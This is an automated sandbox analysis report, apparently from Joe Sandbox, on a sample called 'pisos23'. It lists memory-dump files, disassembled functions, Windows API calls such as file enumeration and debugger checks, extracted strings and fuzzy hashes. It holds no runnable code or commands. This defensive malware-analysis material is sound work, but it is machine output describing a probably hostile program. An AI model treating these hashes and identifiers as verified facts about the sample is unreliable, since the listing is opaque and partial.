Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: 8fOh$9fOh$9fOh
API String ID: 0-171359839
Opcode ID: f816e08243051a99c27291004522b171e2f3a1d695d1713978665c0a21f927ba
Instruction ID: 4a48b5729c61802d9c091e65b525277542477d25abd78c18b2e7eb5c50b20878
Opcode Fuzzy Hash: f816e08243051a99c27291004522b171e2f3a1d695d1713978665c0a21f927ba
Instruction Fuzzy Hash: 7061267B7141004BAB1C8229B8E66BFB7E39792314B7B9827D44BCB364CA76CD46C641

Function 00A67ED0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 496COMMON

Download Yara Rule

Strings

~KYJ, xrefs: 00A6821C
~KYJ, xrefs: 00A68231
}KYJ, xrefs: 00A67F6D

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: }KYJ$~KYJ$~KYJ
API String ID: 0-1877944262
Opcode ID: bd82f774a29989171789209c5cf2129ae5e975817cb2ca49ac7d68d87eb636ac
Instruction ID: 6433b16a4b0a59cd0662e2431fc51701b7255c8e5ef790364f5166395ba2bda1
Opcode Fuzzy Hash: bd82f774a29989171789209c5cf2129ae5e975817cb2ca49ac7d68d87eb636ac
Instruction Fuzzy Hash: AEF15A3572C2018BEE288738C6E466E27F65BA5758F349E1BF115DB360C97DCD888742

Function 00A80A50 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

%Q], xrefs: 00A80C22
%Q], xrefs: 00A80C77
bad array new length, xrefs: 00A80C81

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: %Q]$%Q]$bad array new length
API String ID: 0-1424657863
Opcode ID: d79edd31ad16932ec209b10ab619c9f3a9c0be83561002560b0809ab17ba8c75
Instruction ID: d7b0b6676ac658ecd95e957b0a7632ee6487148cadebadce9d69ae69484e6761
Opcode Fuzzy Hash: d79edd31ad16932ec209b10ab619c9f3a9c0be83561002560b0809ab17ba8c75
Instruction Fuzzy Hash: F2E15971B05201CB8BA8AB2C88C6EAE76E1AF51310F358957E949CB361D635CD8D8B47

Function 00B22160 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cdb4545330bfc613c1cdb4a39239386d69e95b80eb5144edb60bba1d291ade9
Instruction ID: fa6d9b6f63ddbbe5dbf94ceb39b7a2daf99fd393c2d152308b086ff1ff05e1a4
Opcode Fuzzy Hash: 7cdb4545330bfc613c1cdb4a39239386d69e95b80eb5144edb60bba1d291ade9
Instruction Fuzzy Hash: 46021E71E01229AFDF14CFA9D9906AEBBF1FF48314F1482A9D919E7340D731AA41CB94

Function 00B1CA78 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1CB68

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: dd9fe059cd6b0029323f0db39fe45910f0983a541e0a7ed64c0a2e09b05641b8
Instruction ID: 8ede0736d4fe3005498c7d651a2eb1492f130295b76edb0963dcc36b6c7d46f6
Opcode Fuzzy Hash: dd9fe059cd6b0029323f0db39fe45910f0983a541e0a7ed64c0a2e09b05641b8
Instruction Fuzzy Hash: A171A1759851595FDF21EF288C89AEABBF9EB09300F9441E9E00DA3251DA315EC58F50

Function 00B11514 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B11520
IsDebuggerPresent.KERNEL32 ref: 00B115EC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B1160C
UnhandledExceptionFilter.KERNEL32(?), ref: 00B11616

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ecc2e0ff2300717f1863aeedc1c5d3959b444aafe031cff862debe83fd21abc4
Instruction ID: 59f88be7a5084b0e9465f26eec76aa9c2b3404fe6fd278fd68a0af1a4f68a881
Opcode Fuzzy Hash: ecc2e0ff2300717f1863aeedc1c5d3959b444aafe031cff862debe83fd21abc4
Instruction Fuzzy Hash: 7C312975D01219DBDB20EFA4D9897CDBBF8EF08700F5041EAE50DAB250EB719A858F05

Function 00AFF850 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 407COMMON

Download Yara Rule

Strings

W)`, xrefs: 00AFF8AC
W)`, xrefs: 00AFFB35

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: W)`$W)`
API String ID: 0-164646223
Opcode ID: b1a58e6e2f85fac5662958ad168611965f72edf6199b46b4aa6c7c926057ccb3
Instruction ID: 3f0585396dc9b0eac16fd1a2f99d6968b495ce5f2b05bc1433aa462121b706dd
Opcode Fuzzy Hash: b1a58e6e2f85fac5662958ad168611965f72edf6199b46b4aa6c7c926057ccb3
Instruction Fuzzy Hash: 4AD1AE367047095F9A188BAC98D52BE37D29F99394B34993EFA05CB360C625CD89CB42

Function 00B1638A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,3A93E03C), ref: 00B16482
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,3A93E03C), ref: 00B1648C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,3A93E03C), ref: 00B16499

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ac3a64ac80ac2538a251cb4c6d11b712140e0a78ee70dbfcd45d81405e351d34
Instruction ID: 21d55a09b2b8dd8af9b9e6cf297f1f9d1bbe0d224f8b5156bb5478ba9d1d5754
Opcode Fuzzy Hash: ac3a64ac80ac2538a251cb4c6d11b712140e0a78ee70dbfcd45d81405e351d34
Instruction Fuzzy Hash: E031D274901229ABCB21DF28D9897DDBBF8BF18310F5041EAE40CA7290EB709F858F44

Function 00B1C9C7 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1A91E: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00B192BF,00000001,00000364,00000002,000000FF,3A93E03C,00000000,?,00B139C5,00000000,?), ref: 00B1A95F

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1CB68
FindNextFileW.KERNEL32(00000000,?), ref: 00B1CC5C
FindClose.KERNEL32(00000000), ref: 00B1CC9B
FindClose.KERNEL32(00000000), ref: 00B1CCCE

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: Find$CloseFile$AllocateFirstHeapNext
String ID:
API String ID: 4087847297-0
Opcode ID: 565b5309f3e7f2a408d9e078ed840fd025f61973eea767083927928e481a24dc
Instruction ID: 03305dbc6e23f6cde242c48ab96d8005f8152aa83458fdc06e162df6123faa31
Opcode Fuzzy Hash: 565b5309f3e7f2a408d9e078ed840fd025f61973eea767083927928e481a24dc
Instruction Fuzzy Hash: 2851347694011CAFDB25EF289C85AFEBBF9DF45354F9441E9F409D3201EA309E829B60

Function 00B11686 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B1169C

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: db4a3e09a2b5fe11b9e80a0216a1ce4f52f0609943ab6a5d8be07b759a6a390d
Instruction ID: 92ddf437e4fb7354682f11834dd4fa12c87bcb91afc2dcfd9b33e8845ebda410
Opcode Fuzzy Hash: db4a3e09a2b5fe11b9e80a0216a1ce4f52f0609943ab6a5d8be07b759a6a390d
Instruction Fuzzy Hash: 9751B0B1901615CFEB29CF98D9857AEBBF0FB48310F6488AAD515EB390E7749D40CB50

Function 00B181DF Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B182FE
___TypeMatch.LIBVCRUNTIME ref: 00B1840C
CatchIt.LIBVCRUNTIME ref: 00B1845D
_UnwindNestedFrames.LIBCMT ref: 00B1855E
CallUnexpected.LIBVCRUNTIME ref: 00B18579

Strings

csm, xrefs: 00B1821C
csm, xrefs: 00B18335
csm, xrefs: 00B18289

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 580b649ecd0668de14034a6a9f49969e2c695999a3d8717112afd1a3d9ff789f
Instruction ID: 4440819bc7a6dc58fb89672eafa0424f03c5f99099ea2f3b95785b24c36ab635
Opcode Fuzzy Hash: 580b649ecd0668de14034a6a9f49969e2c695999a3d8717112afd1a3d9ff789f
Instruction Fuzzy Hash: 53B17871800209EFCF25DFA4D8819EEBBF6FF15310BA4459AE8116B216DB30DA91CB91

Function 00B1B41B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B1B4A1

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 97cdcdb7666355692ed63309cdb489c69fe6bccfd0a83b5869857655dce76bab
Instruction ID: 23857f9aab2b0f4acbadd78c7f3928a2ad63182bb950b0efd4938231911953d7
Opcode Fuzzy Hash: 97cdcdb7666355692ed63309cdb489c69fe6bccfd0a83b5869857655dce76bab
Instruction Fuzzy Hash: 09B10372A00255AFEB158F64CC82FEEBBE5EF65310F6441E5E904AB282D374DD81C7A0

Function 00B11132 Relevance: 10.7, APIs: 7, Instructions: 153threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B1115A
GetCurrentThreadId.KERNEL32 ref: 00B11177
GetCurrentThreadId.KERNEL32 ref: 00B11198
GetCurrentThreadId.KERNEL32 ref: 00B1121B
__Xtime_diff_to_millis2.LIBCPMT ref: 00B11233
GetCurrentThreadId.KERNEL32 ref: 00B1125F
GetCurrentThreadId.KERNEL32 ref: 00B112A5

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CurrentThread$Xtime_diff_to_millis2
String ID:
API String ID: 1280559528-0
Opcode ID: 01ea5f1d3a659402e809b6899542fbc5a65a06f9719671b1d35cb9ad06129b12
Instruction ID: 7bd379f4acc832a78bf043f007752431db735585309c85ec69cc4973f75f4134
Opcode Fuzzy Hash: 01ea5f1d3a659402e809b6899542fbc5a65a06f9719671b1d35cb9ad06129b12
Instruction Fuzzy Hash: D6516F31900116DBCF20DF58D9859EAB7F5FF08710BA548A9EA06EB251DB30ED81CB90

Function 00B12AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B12B17
___except_validate_context_record.LIBVCRUNTIME ref: 00B12B1F
_ValidateLocalCookies.LIBCMT ref: 00B12BA8
__IsNonwritableInCurrentImage.LIBCMT ref: 00B12BD3
_ValidateLocalCookies.LIBCMT ref: 00B12C28

Strings

csm, xrefs: 00B12BBD

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3e93c9d833eb532ca30d815d953e763725a657c1765bcab06336c1ad5eaa1b9f
Instruction ID: d273254493fb3e4bb0815121415542156a5637edb283b8b3d41db23a96a0d512
Opcode Fuzzy Hash: 3e93c9d833eb532ca30d815d953e763725a657c1765bcab06336c1ad5eaa1b9f
Instruction Fuzzy Hash: 5A41C134A002199BCF14DF68C891ADEBBF1FF44324F5481D5E8199B392DB319EA1CB91

Function 00B18E3A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00B18F49,00000000,00000000,00000000,00000000,00000000,?,00B18CFB,00000022,FlsSetValue,00B28B48,00B28B50,00000000), ref: 00B18EFB

Strings

api-ms-, xrefs: 00B18E91
ext-ms-, xrefs: 00B18EA5

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 9041e32aeacc78aebbfe773be5c1013b3c7bf0d52c7e4c044be5c7ffc6e41a57
Instruction ID: 969f123800480700e03df8e91b0d58a7e4ec719c0c78829ca8e40592cb5efb93
Opcode Fuzzy Hash: 9041e32aeacc78aebbfe773be5c1013b3c7bf0d52c7e4c044be5c7ffc6e41a57
Instruction Fuzzy Hash: 4621A833A01211ABC7319F25AC41AEB37E9FB417A0B6406B5E915A72A1DF30FD41CA90

Function 00B24BA6 Relevance: 9.2, APIs: 6, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(031D05D0,031D05D0,00000000,7FFFFFFF,?,00B24B91,031D05D0,031D05D0,00000000,031D05D0,?,?,?,?,031D05D0,00000000), ref: 00B24C4C
__freea.LIBCMT ref: 00B24DE1
__freea.LIBCMT ref: 00B24DE7
__freea.LIBCMT ref: 00B24E1D
__freea.LIBCMT ref: 00B24E23
__freea.LIBCMT ref: 00B24E33

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 00e4fe9dda0d186685a1fa4b04a84fdc16c133cdf83d701acac925011ff05cf2
Instruction ID: f72cdb5cb273a92224a98a76ebbedac3bd82281798f385e3664afaafc1cdc74e
Opcode Fuzzy Hash: 00e4fe9dda0d186685a1fa4b04a84fdc16c133cdf83d701acac925011ff05cf2
Instruction Fuzzy Hash: EA71F672900226ABDF21AF68AC81FEF7BF9EF49314F2501D9E90CA7681D7359C418761

Function 00B179A3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B1799A,00B12510,00B11674), ref: 00B179B1
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B179BF
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B179D8
SetLastError.KERNEL32(00000000,00B1799A,00B12510,00B11674), ref: 00B17A2A

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
